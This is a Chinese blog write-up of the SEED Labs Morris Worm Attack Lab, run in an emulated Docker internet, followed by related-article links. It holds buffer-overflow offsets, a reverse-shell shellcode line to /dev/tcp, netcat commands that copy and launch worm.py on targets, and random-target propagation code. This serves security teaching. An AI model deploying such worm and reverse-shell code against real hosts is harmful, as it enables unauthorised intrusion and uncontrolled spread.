【SeedLab】Morris Worm Attack Lab

最新推荐文章于 2024-12-21 10:12:00 发布
最新推荐文章于 2024-12-21 10:12:00 发布
阅读量4k 收藏 7
点赞数 3
文章标签: 网络 安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cold_windx/article/details/126417393
版权

实验环境

        本节实验准备了两个环境,internet-nano与internet-mini,我们将在较小的实验环境internet-nano中实现worm程序,最后迁移至internet-mini的大环境中测试。

        由于docker在一次启动过多container时存在bug,在启动internet-mini时使用内置的z_start.sh启动(实际就是分批启动)。

Task 1: Get Familiar with the Lab Setup

        启动internet-nano和map两份docker,等待启动完成,进入 http://localhost:8080/map.html 查看网路拓扑。

 

Task 2: Attack the First Target

        利用缓冲区溢出实现Morris worm的攻击部分。首先运行以下指令关闭随机化地址,这可以让所有的container的缓冲区地址等保持一致。

sudo /sbin/sysctl -w kernel.randomize_va_space=0

4.1 The Skeleton Code

        具体代码骨架查看实验任务书,这里暂时将攻击的目标主机硬编码为10.151.0.71。

4.2 Creating the badfile

        在任意container中向10.151.0.71发送信息,即可看到以下信息(服务端的接收消息在docker up的页面查看,这里是在container中重启server程序看到的)。如果随机化地址成功关闭,那么每次得到的缓冲区地址应该是一样的(但是重启server程序会变动,所以每次重启server需要重新获取地址)。

         修改worm.py,并将其放在任意container启动

! ----------------- In worm.py ----------------------
   ret    = [ebp] + [任意大于等于8的常数]
   offset = [ebp] - [buffer's address] + 4

Frame Pointer (ebp) inside bof():  0xffffd798  <--- ebp
Buffer's address inside bof():     0xffffd728  <--- buffer's address

! ----------------- In container ---------------------
$ chmod +x worm.py
$ ./worm.py

        当在目标主机10.151.0.71看到以下笑脸时,攻击即成功

 4.3 The Shellcode

        shellcode中的内容会被目标主机运行,因此可以修改shellcode实现一些攻击。注意,我们不能修改shellcode的总长度,以及内容中‘*’的位置。(Ins键可以在输入字符时不插入而是直接替换字符)

        在shellcode中键入以下指令,这将会使目标主机的shell窗口重定向得到攻击主机,实现非法远程访问。

   " /bin/bash -i > /dev/tcp/10.153.0.71/9090 0<&1 2>&1         "

 Task 3: Self Duplication

        蠕虫自我增殖的两种策略:1. 通过shellcode实现增殖,只需要一份长代码即可 2. 短代码用于传播,使用shellcode从远端拉取长代码用于繁殖

        本节实验使用第2种策略实现蠕虫增殖。修改worm.py程序如下

! ------------------ In shellcode -----------------
# 用来在服务端接收worm.py文件
" nc -nvl 8080 > /home/seed/worm.py                          "

!------------------- In while True -----------------
    subprocess.run([f"cat badfile | nc -w3 {targetIP} 9090"], shell=True)
    # Give the shellcode some time to run on the target host
    time.sleep(1)
    # 把worm.py文件发送给服务端的8080端口
    subprocess.run([f"cat worm.py | nc -w5 {targetIP} 8080"], shell=True)
    # Sleep for 10 seconds before attacking another host
    time.sleep(10)

        此时再在攻击主机上执行worm.py后,即可在目标主机上发现完整的worm.py文件

 Task 4: Propagation

        这一部分实验用于实现蠕虫的自我传播。在此之前,系统提前安装htop命令,因为后面实验过程中,蠕虫将占用大量系统资源。

        修改worm.py的getNextTarget()函数,该函数用于确定下一个攻击目标。

def getNextTarget():
    while True:
        x = randint(151, 155)
        y = randint(70, 80)
        ip = f'10.{x}.0.{y}'
        # Testing whether a machine is alive or not.
        try:
            output = subprocess.check_output(f"ping -q -c1 -W1 {ip}", shell=True)
            result = output.find(b'1 received')
            if result == -1:
                print(f"{ip} is not alive", flush=True)
            else:
                print(f"*** {ip} is alive, launch the attack", flush=True)
                return ip
        except subprocess.CalledProcessError as ex:
            print(ex)

        此时的worm并不具备传播能力,因此我们需要在worm.py到达目标主机后,通过shellcode在目标主机上运行worm.py。

   " echo '(^_^) Shellcode is running (^_^)';                   "
   " nc -l 8080 > worm.py;                                      "
   " chmod +x worm.py; ./worm.py                               *"

        之后在任意台主机发起攻击,在虚拟机日志中发现受攻击的主机开始扩散蠕虫程序。这里设置的是每台被感染主机只能进行一次扩散,可以去掉程序中的exit(0)加快扩散过程。

 

 Task 5: Preventing Self Infection

        本节实验要求,被感染的主机只能运行一个蠕虫程序(单一进程),用来防止蠕虫过量侵占计算机资源。

# 加在所有逻辑代码最前面
class Single:
    def __init__(self) -> None:
        filename = os.path.basename(__file__)
        lock_file_name = f"/var/run/{filename}.pid"
        self.fd = open(lock_file_name, 'w')     # 文件句柄
        try:
            # 尝试获取锁,只有同一时间只有一个进程实例能够获得锁
            fcntl.flock(self.fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
            self.fd.writelines(str(os.getpid()))
            self.fd.flush()
        except:
            print(f"{filename} have another instance running.")
            exit(0)
    def __del__(self):
        fcntl.flock(self.fd, fcntl.LOCK_UN)
single = Single()

        为了方便观察,worm.py中getNextTarget()固定返回10.152.0.75,并在10.152.0.75发起攻击。此时发现10.152.0.75再次被感染后没有生成新的蠕虫进程。

Task 6: Releasing the Worm on the Mini Internet 

        最后,把实现好的worm.py放在更大的mini internet上运行,不要忘记更改getNextTarget中的ip取值范围。(程序一跑,卡的要死)

 

 

 

cold_windx
关注
morris蠕虫病毒
zhangzhechun的专栏
02-27 1886
发送邮件时,蠕虫会利用Sendmail程序的漏洞,伪装自己的源地址,并将自己的源码附加到邮件中。该蠕虫通过利用Unix系统中的漏洞,以分布式方式快速传播,导致当时的互联网中的数千台计算机崩溃或变得无法使用,造成了大量的损失和混乱。Morris蠕虫的意义不仅在于它是历史上第一次对互联网的破坏性攻击,更在于它促使了更广泛的对计算机安全问题的关注和研究,以及对互联网安全性的提高。由于Morris蠕虫的快速传播和破坏性,它在互联网上造成了严重的影响,促使人们开始关注计算机安全问题,并开展了更广泛的研究和探讨。
(SEED-Lab)Buffer Overflow Vulnerability Lab缓冲区溢出实验
lunan的博客
02-01 8615
(SEED-Lab)Buffer Overflow Vulnerability Lab 欢迎大家访问我的GitHub博客 https://lunan0320.cn 文章目录一、实验目的二、实验步骤与结果2.1 环境初始化2.2 Task1 运行shellcode2.3漏洞程序2.4 Task 22.5 Task 3: ASLR2.6 Task 4: Stack Guard2.7 Task 5:不可执行栈三、参考文献 一、实验目的 理解缓冲区溢出攻击的原理以及如何实施攻击 理解针对缓冲区溢出的防御措施
莫里斯蠕虫源码
weixin_33734785的博客
11-10 1211
/* Magic numbers the program uses to identify other copies of itself. */#define REPORT_PORT 0x2c5d#define MAGIC_1 0x00148898#define MAGIC_2 0x00874697extern int pleasequit;/* This stops the...
黑客的恶梦:Morris蠕虫起源、特征和影响的全面解读
m0_72410588的博客
08-30 1035
计算机历史上有许多著名的恶意软件,其中之一就是引发巨大影响的Morris蠕虫。作为早期的互联网安全事件之一,Morris蠕虫对计算机系统造成了严重破坏。本文将全面解读Morris蠕虫的起源、特征和对计算机系统的影响。
Morris蠕虫源代码
07-15
Morris 蠕虫 源代码Morris 蠕虫 源代码Morris 蠕虫 源代码Morris 蠕虫 源代码Morris 蠕虫 源代码
morris worm source code
05-30
世界上第一个蠕虫,后来用C编写的源码,供学习参考之用.
Morris_worm.zip_WORM
09-21
Morris Worm.zip_WORM】是一个与网络安全历史密切相关的压缩包,其中包含了著名的“莫里斯蠕虫”(Morris Worm)的源代码。这个蠕虫是互联网历史上第一次大规模的网络攻击事件,对当时的互联网产生了深远影响。 ...
analysis of morris code worm
09-23
Morris蠕虫分析Morris蠕虫是计算机历史上最早且具有重大影响的网络蠕虫之一,由罗伯特·莫里斯在1988年编写。蠕虫的设计原理和实施策略对于理解网络安全和防御机制至关重要。以下是对其关键特征和行为的详细...
Morris_Lecar_Matlab.zip_MORRIS LECAR_Morris Lecar model_Morris a
09-24
Morris-Lecar模型在Matlab环境中的实现与应用》 Morris-Lecar模型是一种经典的神经元动力学模型,由John H. Morris和Vivian Lecar于1981年提出,用于描述神经元的电压门控离子通道行为。这个模型通过简化复杂的...
学习笔记 蠕虫起源
Zdethm的博客
12-11 768
蠕虫起源 1988 年 11 月 2 日,最早通过互联网传播的计算机蠕虫之 一莫里斯蠕虫Morris worm)诞生。莫里斯蠕虫由康奈 尔大学的研究生罗伯特·塔潘·莫里斯(Robert Tappan Morris)编写,首先于麻省理工学院的计算机系统发布; 莫里斯的父亲是贝尔实验室的科学家,Unix 的合著者,NC SC(国家计算机安全中心)的前首席科学家。 罗伯特·莫里斯的父亲叫什么名字? 罗伯特.莫里斯(RobertMorris) ...
网络攻防技术-Lab5-shellcode编写实验(SEED Labs – Shellcode Development Lab)
fgdhf的博客
10-30 2930
网络攻防技术实验,实验环境、实验说明、实验代码见 Shellcode Development Lab。Task 2: Using Code Segment。网络攻防技术 Lab5 shellcode编写实验 SEED Labs – Shellcode Development Lab
盘点15个臭名昭著的网络病毒或恶意软件,从零基础到精通,收藏这篇就够了!
最新发布
Javachichi的博客
12-21 1578
2000 年,24 岁的 Onel de Guzman住在菲律宾,与本榜单中的前几位恶意软件制作者不同,他的意图非常直接:他买不起拨号服务,所以制作了一个蠕虫病毒,窃取他人的密码,以便从他们的账户中 “搭便车”。但是,这个恶意软件巧妙地利用了 Windows 95 中的一些缺陷,尤其是 Windows 自动隐藏电子邮件附件的文件扩展名,使人们意识不到他们启动的是可执行文件,因此它像野火一样蔓延开来,很快就有数百万台受感染的计算机发送蠕虫病毒副本,并将密码传送回一个菲律宾人的电子邮件地址。
SeedLab——Shellcode Development Lab
Aft3rGl0w的博客
01-15 1884
通常情况下,为了将这个字符串推入堆栈,我们需要使字符串的长度为 4 的倍数,所以我们会将字符串转换为 /bin////bash。然而,对于此任务,我们不能向字符串中添加任何多余的 /,也就是说,命令的长度必须是 9 个字节(/bin/bash)。将args的地址加载到ecx寄存器,envs的地址加载到edx寄存器,path的地址已经存在ebx寄存器中了。ebx寄存器为传递的参数一即path的地址,ecx寄存器为传递的参数二即args的地址,edx寄存器为传递的参数三即envs的地址。然后传递envs参数。
【历史上的今天】11 月 2 日:蠕虫起源;iPad mini 上市;领英注册域名
热门推荐
历史上的今天
11-02 1万+
11 月 2 日,历史上的今天,编程语言先驱 Adriaan van Wijngaarden 出生;NP 问题的提出者 Leonid Levin 出生;第一种蠕虫病毒 Morris 诞生;域名 Linkedin.com 注册成功。
0-引言:Morris蠕虫现在还有用吗
Just have fun
07-17 1775
二十多年前,StuxNet蠕虫名都重创了位于Bushehr和Natantz的伊朗核电厂。它是世界上第一个数字武器,出自康奈尔大学的一名研究生之手。 以他的名字命名的这个病毒感染了6000台工作站。虽然按今天的标准,6000台工作站似乎微不足道,但在1988年,这个数字确实五连网上计算机总量的近一成。 据美国政府相关部门的粗略估计,为了消除Morris蠕虫留下的遗害,花费了一千万到一亿美元的经费。
Morris病毒
ston1992110的专栏
04-20 3494
Morris病毒由Robert Morris于1988年编写,
[SEEDLabs]buffer overflow
痛苦实验记录
03-10 7543
纠结又纠结的实验,希望下次老师能讲清楚每个实验的要求……解决好前面的问题之后,后面几个上手就没有那么困难了。我果然还是学的太不扎实了,也缺少相关经验,磨蹭了好久才弄出来,羞愧。 1.环境配置 首先是配置虚拟机,在官网可以下载vitual box可用的镜像,然后自己安装一下。提前配置好的虚拟机自己不用调节很多。 然后讲一讲这个实验。我们做的版本是Buffer Overflow Attack Lab (Server Version),在Ubuntu2...
SEED LABS初入
SiSong_Ru的博客
03-05 5752
SEED LABS初入及实验环境配置 1、什么是SEED LABS? SEED LABS是一系列的网络安全实验,其基本囊括了信息安全本科生所涉及到的几乎每个方面,例如软件安全,Web安全,密码学安全等。而每一个方面的实验又由好几个单独的实验组成: 每个实验均配套有相应的实验代码已经实验指导书,甚标注了实验难度,至还出有配套的实验视频,学生可以只有选择自己喜欢的实验内容来完成。 ...
SEEDLAB【学习随记】
weixin_44166072的博客
08-10 2182
SEEDLAB - FORMAT_STRING_SERVER 格式化字符串攻击介绍Task1:运行程序,了解程序的主要作用。Task2:理解栈的布局。Task3: 使程序崩溃。Task4: 打印服务器程序的内存中的内容。Task5:改变服务器程序的内存。Task6:向服务器程序注入恶意代码。Task 7: Getting a Reverse ShellTask 8: Fix the Problem 介绍 C语言中printf()函数的作用是根据字符串的格式输出字符串。它的第一个参数称为format stri
二叉树遍历的高效方法:Morris遍历详解
二叉树的Morris遍历是一种不使用栈、队列和递归的遍历方式,能够以O(1)的空间复杂度遍历二叉树。Morris遍历方法是由发明者Joseph M. Morris在1979年提出的。Morris遍历算法主要分为Morris前序遍历和Morris中序遍历。...
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值